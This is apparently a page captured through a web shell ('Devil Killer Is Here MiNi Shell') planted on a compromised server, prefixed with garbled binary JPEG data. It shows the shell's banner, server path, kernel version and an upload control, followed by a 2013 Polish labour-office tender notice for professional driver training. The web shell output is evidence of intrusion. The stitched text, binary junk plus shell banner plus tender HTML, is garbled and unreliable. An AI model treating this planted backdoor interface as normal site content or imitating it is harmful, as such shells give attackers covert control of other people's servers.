JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131002/400108-N-2013.html

<p class="kh_header"><b>Będzin: Świadczenie usługi organizacji szkolenia dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Będzinie w zakresie: Szkolenie okresowe dla kierowców wykonujących transport drogowy z zakresu prawa jazdy kat. C, C1, C+E, C1+E</b><br>
<b>Numer ogłoszenia: 400108 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Będzinie , ul. Ignacego Krasickiego 17A, 42-500 Będzin, woj. śląskie, tel. 32 2673003, 2674444, faks 32 2674153.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi organizacji szkolenia dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Będzinie w zakresie: Szkolenie okresowe dla kierowców wykonujących transport drogowy z zakresu prawa jazdy kat. C, C1, C+E, C1+E.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego Zamówienia jest świadczenie usługi w rozumieniu ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2013 r., poz. 907 ze zm.), zwanej dalej ustawą na organizację szkolenia dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Będzinie, zwanych dalej uczestnikami w zakresie Szkolenie okresowe dla kierowców wykonujących transport drogowy z zakresu prawa jazdy kat. C, C1, C+E, C1+E. 
2.	We Wspólnym Słowniku Zamówień, o którym mowa w art. 30 ust. 7 ustawy, 
usługa oznaczona jest kodem 80411200-0 o nazwie: Usługi szkół nauki jazdy.
3.	Zakres usługi:
1)	Przeprowadzenie szkolenia w formie kursu stacjonarnego, o którym mowa w ust. 15 niniejszego punktu ogłoszenia w zakresie określonym w ust. 1 niniejszego punktu ogłoszenia.
2)	Szkoleniem będzie objętych 20 uczestników - skierowanych przez Zamawiającego, 
z zastrzeżeniem ust. 3 pkt 5 niniejszego punktu ogłoszenia.
3)	Wymagany termin wykonania zamówienia:
a)	rozpoczęcie: po zawarciu umowy w sprawie udzielenia niniejszego zamówienia,
b)	zakończenie: nie później niż do 22 listopada 2013 roku.
4)	Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie określony 
w harmonogramie szkolenia stanowiącym załącznik do umowy w sprawie udzielenia niniejszego zamówienia (wzór umowy stanowi załącznik nr 8 do niniejszej SIWZ).
5)	Zamawiający zastrzega sobie prawo:
a)	zmniejszenia liczby uczestników szkolenia o nie więcej niż 3 osoby w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu bezrobotnego, niezgłoszenie się po skierowanie na szkolenie, itp.),
b)	zwiększenia liczby uczestników szkolenia o nie więcej niż 3 osoby. 
4.	Szkolenie musi obejmować minimum 35 godzin zajęć szkoleniowych.
5.	Program szkolenia musi być zgodny z:
1)	rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, 
poz. 314 z późn. zm.),
2)	§ 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 
2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. 
Nr 177, poz, 1193 ze z późn. zm.).
6.	Zajęcia szkoleniowe muszą odbywać się we wszystkie dni robocze od poniedziałku 
do piątku z wyłączeniem świąt w przedziale czasowym od 8:00 do 20:00, 
z zastrzeżeniem, że liczba godzin zajęć szkoleniowych w ciągu tygodnia obejmować będzie przeciętnie nie mniej niż 25 zajęć szkoleniowych, chyba że przepisy odrębne lub specyfika szkolenia przewidują inny wymiar zajęć szkoleniowych. Przepisy rozporządzenia Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, poz. 314 z późn. zm.) stosuje się odpowiednio.
7.	Szkolenie powinno być przeprowadzone przez instytucję szkoleniową dysponującą wykwalifikowaną kadrą wykładowców i instruktorów posiadających wykształcenie
i kwalifikacje oraz doświadczenie zawodowe zgodne z kierunkiem szkolenia 
lub prowadzonych przedmiotów/zagadnień - a także, jeżeli są wymagane - udokumentowane uprawnienia do prowadzenia danego szkolenia.
8.	Szkolenie winno być przeprowadzone w warunkach lokalowych dostosowanych 
do prowadzenia zajęć dydaktycznych i pod tym kątem odpowiednio wyposażonych. Sale dydaktyczne i ćwiczeniowe winny być przestronne o wielkości dostosowanej do liczby uczestników, dostosowane do kierunku szkolenia, odpowiednio wyposażonej w: 
a)	miejsca siedzące i stoliki lub biurka dla 20 uczestników (+/- 3) oraz jedno krzesło lub fotel dla osoby monitorującej szkolenie z ramienia Zamawiającego lub instytucji kontrolujących,
b)	okno (z możliwością otwarcia i zaciemnienia),
c)	sztuczne oświetlenie, 
d)	dostęp do zaplecza sanitarnego
9.	Wykonawca po zakończeniu szkolenia winien zorganizować przeprowadzenie , zgodnie z obowiązującymi przepisami prawa, badań lekarskich w celu uzyskania przez poszczególnych uczestników szkolenia orzeczenia lekarskiego o możliwości podjęcia zatrudnienia zgodnie z kierunkiem szkolenia. Koszt przedmiotowych badań Wykonawca zobowiązany jest uwzględnić dokonując obliczenia ceny.	
10.	 Wykonawca zobowiązany jest wydać uczestnikom szkolenia dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia.
11.	Zajęcia szkoleniowe muszą być przeprowadzone na terenie Powiatu Będzińskiego,  miasta Sosnowiec, miasta Dąbrowa Górnicza lub miasta Katowice z zastrzeżeniem, że czas dojazdu i powrotu uczestników szkolenia z siedziby Zamawiającego do miejsca 
i z miejsca szkolenia, w którym zgodnie z programem szkolenia odbywać się będą zajęcia szkoleniowe nie może przekraczać łącznie 3 godzin dziennie.
12.	Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia bezpłatne zaplecze socjalne obejmujące kawę, herbatę, wodę i napoje zimne w ilości zaspokajającej potrzeby uczestników.
13.	Wykonawca zobowiązany będzie zapewnić uczestnikom szkolenia w trakcie trwania szkolenia warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
14.	Wykonawca zobowiązany jest zorganizować szkolenie zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, poz. 314 z późn. zm.).
15.	Wszystkie zajęcia muszą być przeprowadzone w systemie stacjonarnym. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e- learningu, w formie eksternistycznej.
16.	Wykonawca zobowiązany jest zapewnić uczestnikom konieczne materiały dydaktyczne - zgodne z tematyką szkolenia, w skład których wchodzą w szczególności: podręcznik 
lub inne niezbędne materiały szkoleniowe oraz notatnik (minimum format A5 60-kartkowy) i przybory do pisania, przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe powinny być przekazywane uczestnikom szkolenia 
wraz z rozpoczęciem szkolenia, bądź na bieżąco zgodnie z realizowanym tematem zajęć.
17.	Wykonawca zobowiązany jest wystawić każdemu uczestnikowi szkolenia 
po pozytywnym jego zakończeniu zaświadczenie o ukończeniu szkolenia zgodne z wymogami zawartymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 14 września  2010 roku w sprawie standardów i warunków prowadzenia usług rynku pracy /Dz. U. z 2010 Nr 177 poz.1193 z późn. zm./ zawierające co najmniej:
1)	numer z rejestru,
2)	imię/imiona i nazwisko uczestnika szkolenia,
3)	datę i miejsce urodzenia,
4)	numer PESEL,
5)	nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
6)	formę i nazwę szkolenia,
7)	okres trwania szkolenia,
8)	miejsce, datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończeni szkolenia i uzyskanie kwalifikacji,
9)	tematy i wymiar godzin zajęć edukacyjnych,
10)	pieczęć i podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
18.	Oprócz zaświadczenia, o którym mowa w ust.17 niniejszego punktu ogłoszenia uczestnikowi szkolenia po pozytywnym jego zakończeniu zostanie wydane świadectwo kwalifikacji zawodowej, o którym mowa w § 19 ust. 1 rozporządzenia Ministra Infrastruktury z dnia 
1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, poz. 314 z późn. zm.).
19.	Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć teoretycznych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia, wymiar godzin i tematy zajęć edukacyjnych, rejestr wydanych dokumentów potwierdzających ukończenie szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych.
20.	Cena szkolenia nie powinna uwzględniać:
1)	kosztów ubezpieczenia od następstw nieszczęśliwych wypadków,
2)	kosztów przejazdu.
21.	Koszty, o których mowa w ust. 20 pkt 1 niniejszego punktu ogłoszenia zostaną zwrócone Wykonawcy po przedstawieniu Zamawiającemu odrębnej faktury VAT 
wraz z dokumentacją potwierdzającą poniesienie tych kosztów, na zasadach określonych w umowie szkoleniowej zawartej z wykonawcą szkolenia.
22.	Koszty, o których mowa w ust. 20 pkt 2  niniejszego punktu ogłoszenia sfinansuje Zamawiający we własnym zakresie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiającyuzna spełnianie przez Wykonawcę warunku posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w przypadku gdy Wykonawca ten wykaże, 
że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia
i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013 r., poz. 674 z późn. zm.), składając oświadczenie według wzoru określonego w załączniku nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania wiedzy 
i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat /* przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował minimum jedno szkolenie w zakresie kwalifikacji wstępnej lub wstępnej przyspieszonej lub szkolenia okresowego dla kierowców wykonujących przewóz drogowy z zakresu prawa jazdy kat.C, C1, C+E, C1+E , przy czym wymiar tego szkolenia wynosił co najmniej 35 godzin zajęć szkoleniowych, a przedmiotowym szkoleniem zostało objętych minimum 15 osób z podaniem wartości poszczególnych szkoleń, ich przedmiotu, dat wykonania i podmiotów, na rzecz których szkolenia te zostały wykonane oraz załączy dowody potwierdzające, czy każde z tych szkoleń zostało wykonane lub w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie /**, zamieszczając przedmiotowe informacje w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącym załącznik nr 6 do SIWZ.
Dowodami potwierdzającymi, czy usługi zostały wykonane lub są wykonywane należycie są:
a)	poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ust. 2 pkt 2 lit. a niniejszego Rozdziału (w takim przypadku Wykonawca zobowiązany jest wskazać obiektywne przyczyny uniemożliwiające uzyskanie przedmiotowego poświadczenia),
c)	inne niż poświadczenia, o których mowa w ust. 2 pkt 2 lit. a niniejszego Rozdziału, dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, 
jakich może żądać zamawiający od wykonawcy oraz form, w jakich 
te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817), np. referencje, rekomendacje.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w Wykazie wykonanych, a w przypadku świadczeń okresowych 
lub ciągłych - wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. 2 pkt 2 lit. a - b niniejszego Rozdziału.
W razie konieczności, szczególnie gdy Wykaz lub dowody, o których mowa 
w ust. 2 pkt 2 niniejszego Rozdziału budzą wątpliwości Zamawiającego
lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie 
nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji 
lub dokumentów bezpośrednio Zamawiającemu.
/*  okres ostatnich trzech lat nie dotyczy lat kalendarzowych, przy obliczaniu tego terminu należy stosować art. 112 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny, zgodnie z którym termin oznaczony w latach kończy się z upływem dnia, który nazwą lub datą odpowiada początkowemu dniowi terminu.
/** należy wypełnić wszystkie pozycje formularza - Wykaz wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych - wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - w tym okresie stanowiącego załącznik nr 6 do SIWZ, podając w każdej wypełnionej pozycji formularza:
     - nazwę - przedmiot usługi odpowiadający opisowi przedmiotu zamówieniaw Rozdziale II SIWZ w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, to jest co najmniej 1 główną usługę polegającą na przeszkoleniu co najmniej 15 osób w zakresie kwalifikacji wstępnej lub wstępnej przyspieszonej lub szkolenia okresowego dla kierowców wykonujących przewóz drogowy z zakresu prawa jazdy kat.C, C1, C+E, C1+E, o wymiarze co najmniej 35 godzin zajęć szkoleniowych w ramach  przedmiotowego szkolenia,
    -  liczbę uczestników szkolenia,
    -  wartość szkolenia w PLN,
    - datę wykonania każdego szkolenia, a  w przypadku świadczeń okresowych 
 lub ciągłych - datę poszczególnych szkoleń  (od  - dzień, miesiąc, rok 
do  - dzień, miesiąc rok),
   - odbiorcę usługi - podmiot, na rzecz którego usługa została wykonana 
lub jest wykonywana (nazwę podmiotu zlecającego szkolenie, adres oraz telefon kontaktowy),
? - nazwę dowodu potwierdzającego, że usługa ta została wykonana 
należycie lub w przypadku świadczeń okresowych lub ciągłych 
jest wykonywana należycie - (należy nazwać ten dokument, np. referencja, rekomendacja, poświadczenie, przy czym dokument ten, z zastrzeżeniem ust. 
2 pkt 2 lit. b niniejszego punktu ogłoszenia, powinien być wystawiony przez osobę trzecią - podmiot zlecający usługę oraz dotyczyć wyłącznie zakresu odpowiadającego przedmiotowi zamówienia opisanego w Rozdziale II ust. 1 SIWZ), dokument należy załączyć do oferty oraz podać numer strony, którym dokument jest oznaczony 
w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym  jeśli Wykonawca ten na czas realizacji niniejszego zamówienia będzie dysponować odpowiednim potencjałem technicznym , co potwierdzi złożeniem oświadczenia wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania  osobami zdolnymi do wykonania zamówienia jeśli Wykonawca ten na czas realizacji niniejszego zamówienia będzie dysponować osobami zdolnymi do wykonania zamówienia, co potwierdzi złożeniem oświadczenia wg wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku znajdowania się 
w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, 
że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składając oświadczenie wg wzoru stanowiącym załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) wypełniony formularz oferty (wzór formularza stanowi załącznik nr 1 do SIWZ)
2) wypełniony program szkolenia (wzór dokumentu stanowi załącznik nr 7 do SIWZ)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oświadczenie Wykonawcy o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (wzór oświadczenia stanowi załącznik nr 5 
do SIWZ),
2) certyfikaty jakości usług - w przypadku ich posiadania - przez certyfikaty jakości usług Zamawiający rozumie certyfikat systemu zarządzania jakością kształcenia / szkolenia, wydany na podstawie międzynarodowych norm ISO oraz akredytację kuratora oświaty w zakresie przedmiotowego szkolenia to jest szkolenia kierowców wykonujących przewóz drogowy z zakresu prawa jazdy kat. C, C1, C+E, C1+E,
3) pełnomocnictwo do reprezentowania Wykonawcy, o którym mowa w Rozdziale IX ust. 5 SIWZ, o ile ofertę składa pełnomocnik</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
